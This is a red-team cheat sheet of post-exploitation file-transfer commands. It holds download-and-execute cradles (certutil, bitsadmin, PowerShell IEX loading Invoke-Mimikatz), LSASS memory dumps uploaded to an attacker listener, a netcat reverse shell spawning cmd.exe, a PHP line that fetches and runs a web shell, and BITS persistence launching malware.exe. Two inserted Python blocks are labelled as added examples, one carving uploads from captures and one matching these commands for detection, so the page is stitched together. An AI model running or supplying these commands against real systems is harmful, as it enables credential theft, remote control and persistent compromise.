Red Teaming and Malware Analysis
File Transfer

Basic commands

python -m SimpleHTTPServer 80
php -S 0.0.0.0:80

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
powershell.exe -c "Start-BitsTransfer -Source http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe"
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
powershell Invoke-WebRequest http://10.10.14.10/nc.exe -OutFile nc.exe
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

execute ps1 files

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File jaws.ps1
powershell.exe -ExecutionPolicy Bypass -File jaws.ps1

load it into memory

IEX(New-Object Net.WebClient).downloadString('http://10.10.15.189:9999/jaws-enum.ps1')
powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.14/shell.ps1\")
powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.14.14/shell.ps1\")

ninja1

echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.15.189:9999/jaws-enum.ps1" >>wget.ps1
echo $file = "jaws.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

SMB

python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support
net view \\10.10.14.17
copy \\10.10.14.17\a\nc.exe .
copy nc2.exe \\10.10.14.17\a\nc2.exe

SMB with password + lsass dump

python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support -debug -comment "use it" -username admin -password 123 -ts
C:\>net use s: \\10.201.69.16\a /user:admin 123
S:\>procdump.exe -ma lsass.exe c:\TEMP\a.txt
copy c:\TEMP\a.txt.dmp s:

Execute nc via SMB (bypass defenses)

\\10.10.14.17\SHARE\nc.exe -nv 10.10.14.17 4444 -e cmd.exe

netcat

ncat -lvp 80 > nc2.exe
nc -nv 10.10.14.17 80 < nc.exe -w 15

copy files from target to kali

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile(\"http://10.9.4.210:9999/\", \"lsass.dmp\")
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile('http://10.92.137.181:8888', 'zzzzzz.txt.dmp')

nc -lvp 9999 > lsass.dmp

with PHP

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

HTTP-POST

http-post.py
./curl -F 'file=@firefox.exe_190824_231811.dmp' 10.10.15.213:8000/ -v
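Both WebClient.UploadFile and curl -F send the file as multipart/form-data, so a bare listener such as `nc -lvp 9999 > lsass.dmp` saves the request line, the headers and the boundary framing together with the dump, and the same framing is what an analyst sees when carving an upload out of a captured TCP stream. The script below is an added example, not the http-post.py referred to above and not code from this page: it strips that framing from a capture; the sample request is constructed.

```python
import re
import sys

def split_request(raw: bytes):
    """Split a captured HTTP request into (headers, body).
    Input that does not start with a request line is treated as a bare body."""
    if not raw.startswith((b"POST ", b"PUT ")):
        return {}, raw
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:            # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def extract_file(raw: bytes):
    """Return (filename, data) of the first file part of a multipart/form-data
    upload, or None. Works on a raw listener capture or on a bare body."""
    headers, body = split_request(raw)
    match = re.search(rb"boundary=([^;]+)", headers.get(b"content-type", b""))
    if match:
        boundary = match.group(1).strip(b'"')
    else:
        boundary = body.split(b"\r\n", 1)[0][2:]    # first line is the dash-boundary
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):                  # closing delimiter reached
            break
        part_head, _, part_data = part[2:].partition(b"\r\n\r\n")
        name = re.search(rb'filename="([^"]*)"', part_head)
        if name:
            return name.group(1).decode(), part_data[:-2]   # drop CRLF before next delimiter
    return None

# Constructed sample of what curl -F 'file=@lsass.dmp' or WebClient.UploadFile
# leaves in a listener capture; the payload bytes are made up.
SAMPLE_CAPTURE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: 10.10.14.17:9999\r\n"
    b"Content-Type: multipart/form-data; boundary=BOUNDARY123\r\n"
    b"Content-Length: 170\r\n"
    b"\r\n"
    b"--BOUNDARY123\r\n"
    b'Content-Disposition: form-data; name="file"; filename="lsass.dmp"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"MDMP\x93\xa7\x00\x00fake-minidump-bytes\r\n"
    b"--BOUNDARY123--\r\n"
)

if __name__ == "__main__":
    # usage: python3 extract_upload.py capture.bin
    name, data = extract_file(open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CAPTURE)
    print(f"{name}: {len(data)} bytes")
```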

/dev/tcp

cat xxx.zip > /dev/tcp/10.x.x.x/9001
nc -lvp 9001 > xxx.zip

fetch (OpenBSD)

fetch http://10.11.0.244/exploit.c
<?php system("fetch -o /usr/local/databases/shell.php http://10.11.0.244/shell.php; php /usr/local/databases/shell.php"); ?>

rdesktop or remmina

rdesktop -r disk:tmp=/home/user/Desktop <remote ip address>

BITS

Download file into the C:\Windows folder.

> bitsadmin /create download
> bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe
> bitsadmin /resume download
> bitsadmin /complete download

Created job {EA8603EB-7CC2-44EC-B1EE-E9923290C2ED}.
Added https://<site>/malware.exe -> c:\windows\malware.exe to job.
Job resumed.
Job completed.

Create persistence.

> bitsadmin /create persistence
> bitsadmin /addfile persistence http://127.0.0.1/invalid.exe c:\windows\i.exe
> bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL
> bitsadmin /resume persistence
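The one-liners under Basic commands, the comsvcs MiniDump line and the bitsadmin job sequence above all land verbatim in process-creation telemetry, which is the cheapest place to catch them. The following is an added example, not code from this page or from any of the referenced tools: Python signatures for those exact command shapes, run over constructed command lines; the log field names and the benign look-alikes are assumptions.

```python
import re

# Signatures for the download / dump one-liners on this page, meant for the
# CommandLine field of Sysmon Event ID 1 or Security 4688 (assumed source).
CRADLE_PATTERNS = {
    "certutil_urlcache": re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I),
    "bitsadmin_job": re.compile(r"bitsadmin(\.exe)?\s.*/(transfer|addfile|SetNotifyCmdLine)", re.I),
    "ps_webclient": re.compile(r"New-Object\s+(System\.)?Net\.WebClient|\.(DownloadString|DownloadFile|UploadFile)\(", re.I),
    "ps_iwr_bits": re.compile(r"Invoke-WebRequest|\biwr\b|\bwget\b|Start-BitsTransfer", re.I),
    "comsvcs_minidump": re.compile(r"comsvcs\.dll,?\s*MiniDump", re.I),
    "unc_exec": re.compile(r"^\s*\\\\\d{1,3}(\.\d{1,3}){3}\\\S+\.exe", re.I),
}

def classify(cmdline: str) -> list:
    """Return the names of every signature that matches one command line."""
    hits = []
    is_ps = re.search(r"powershell", cmdline, re.I) is not None
    for name, pattern in CRADLE_PATTERNS.items():
        if name.startswith("ps_") and not is_ps:
            continue  # PowerShell cradles only count inside a powershell invocation
        if pattern.search(cmdline):
            hits.append(name)
    return hits

def scan(cmdlines) -> dict:
    """Map the index of each flagged command line to its matching signatures."""
    return {i: h for i, c in enumerate(cmdlines) if (h := classify(c))}

# Constructed sample: the page's own one-liners plus benign look-alikes.
SAMPLE_CMDLINES = [
    r"certutil.exe -urlcache -split -f http://10.10.14.17/nc.exe c:\temp\nc.exe",
    r"bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe",
    r"powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')",
    r'powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile("http://10.9.4.210:9999/", "lsass.dmp")',
    r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full",
    r"bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL",
    r"\\10.10.14.17\SHARE\nc.exe -nv 10.10.14.17 4444 -e cmd.exe",
    r"certutil -hashfile C:\tools\nc.exe SHA256",        # benign: no -urlcache
    r"powershell.exe -NoProfile Get-ChildItem C:\temp",  # benign: no download cradle
    r"bitsadmin /list /allusers",                        # benign: no job created
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_CMDLINES).items():
        print(f"[{','.join(hits)}] {SAMPLE_CMDLINES[idx]}")
```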

updog

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.

or simply:

python -m SimpleHTTPServer 8080
References

  • updog
  • or HTTPS with upload: SecurityTools/httpsWithUpload.py at master · rhmoult/SecurityTools (GitHub)
  • Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service (Mandiant)
  • Post Exploitation File Transfers on Windows the Manual Way
  • 15 Ways to Download a File (NetSPI)
  • Transferring Files from Linux to Windows (post-exploitation) (ropnop blog)